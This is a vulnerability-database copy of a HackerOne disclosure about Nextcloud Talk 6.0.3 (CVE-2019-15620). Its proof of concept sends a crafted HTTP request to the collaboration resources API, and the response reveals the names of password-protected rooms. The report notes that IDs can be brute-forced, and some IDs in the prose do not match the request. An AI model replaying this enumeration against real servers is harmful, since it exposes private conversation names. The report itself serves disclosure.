Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneFoobar7H1:662218
HistoryJul 28, 2019 - 11:34 a.m.

Nextcloud: Talk - Leak of password-protected room name via already existent resource addition

2019-07-2811:34:30
foobar7
hackerone.com
$150
23

0.001 Low

EPSS

Percentile

22.7%

JSON

CVSS

Medium 4.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Description

Affected: Talk / Spreed 6.0.3

The name of shared but password-protected rooms leaks to low-privileged authenticated users.

An attacker does not need to guess room IDs, but can simply iterate over IDs to gather all names of all affected rooms.

POC

Setup:

  • Add a password-protected room: Talk -> New conversation -> enter a name -> Share link -> set password
  • Add a project: Projects -> Add a project -> select a file

Attack with a low-privileged user:

  • Build the following request (eg by going to Projects -> Add project -> select a file in a project the user has access to):

      POST /nextcloud/nextcloud/ocs/v2.php/collaboration/resources/collections/21?format=json HTTP/1.1
  Host: 192.168.0.104
  User-Agent: [...]
  Accept: application/json, text/plain, */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/json;charset=utf-8
  requesttoken: [...]
  Content-Length: 43
  Connection: close
  Cookie: [...]

  {"resourceType":"file","resourceId":"1619"}

16 is the ID of the password-protected room that the user does not have access to. 1626 is the ID of a file that was shared under the “projects” tab in that room. It is required that the file is already shared, but IDs are iterative and can easily be bruteforced.

The response will contain the room name & ID and the name of the shared file:

HTTP/1.1 200 OK
[...]

{"ocs":{"meta":{"status":"ok","statuscode":200,"message":"OK"},"data":{"id":21,"name":"privateprivateprivate","resources":[{"type":"file","id":"1619","name":"aaaa.txt","path":"files\/aaaa.txt","link":"http:\/\/192.168.0.104\/nextcloud\/nextcloud\/index.php\/f\/1619","mimetype":"text\/plain","preview-available":true},{"type":"room","id":"w3die6ou","name":"privateprivateprivate","call-type":"public","iconUrl":"http:\/\/192.168.0.104\/nextcloud\/nextcloud\/apps\/spreed\/img\/app-dark.svg","link":"http:\/\/192.168.0.104\/nextcloud\/nextcloud\/index.php\/call\/w3die6ou"}]}}}

Impact

leak of all password-protected room names to low-privileged attacker

Related

osv 1
cvelist 1
nextcloud 1
cve 1
prion 1
nvd 1
rosalinux 1
osv
osv
CVE-2019-15620
2020-02-04 20:15:12
cvelist
cvelist
CVE-2019-15620
2020-02-04 19:08:57
nextcloud
nextcloud
Name of private conversations leaked when linked via projects to a shared item (NC-SA-2020-011)
2019-07-29 00:00:00
cve
cve
CVE-2019-15620
2020-02-04 20:15:12
prion
prion
Improper access control
2020-02-04 20:15:00
nvd
nvd
CVE-2019-15620
2020-02-04 20:15:12
rosalinux
rosalinux
Advisory ROSA-SA-2021-1983
2021-07-02 18:14:14

0.001 Low

EPSS

Percentile

22.7%

JSON
Related for H1:662218
osv1cvelist1nextcloud1cve1prion1nvd1rosalinux1